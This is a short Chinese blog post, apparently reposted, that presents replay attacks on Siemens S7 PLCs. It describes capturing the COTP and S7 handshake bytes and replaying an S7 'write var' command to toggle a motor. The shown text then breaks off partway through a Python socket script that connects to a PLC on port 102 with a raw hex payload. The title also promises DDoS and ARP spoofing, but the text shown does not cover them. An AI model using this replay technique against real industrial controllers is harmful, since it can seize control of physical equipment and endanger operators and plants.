PLC工业协议报文攻击/重放攻击+DDOS+ARP欺骗

zhangchen 好物分享

PLC重放攻击
一、与PLC连接
连接PLC:tcp三次握手 1.SYN 2.SYN,ACK 3.ACK 二次认证:COTP+S7协议(七层公共协议模型) COTP-TPKT层十六进制复制出来(只需要03000016(也包括这段)之后的认证数据)【一次认证】 S7协议-TPKT 同理(03000019 【二次认证】
二、操控
s7协议发送命令(03000024 write var)以电机为例:传bool参数false true
三、模拟发包
import socket
import time

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(("192.168.2.25",102)) # IP地址+端口
pp = "0300001611e00000000100c10

PLC工业协议报文攻击/重放攻击+DDOS+ARP欺骗最先出现在Python成神之路

版权声明:
作者:zhangchen
链接:https://www.techfm.club/p/3873.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>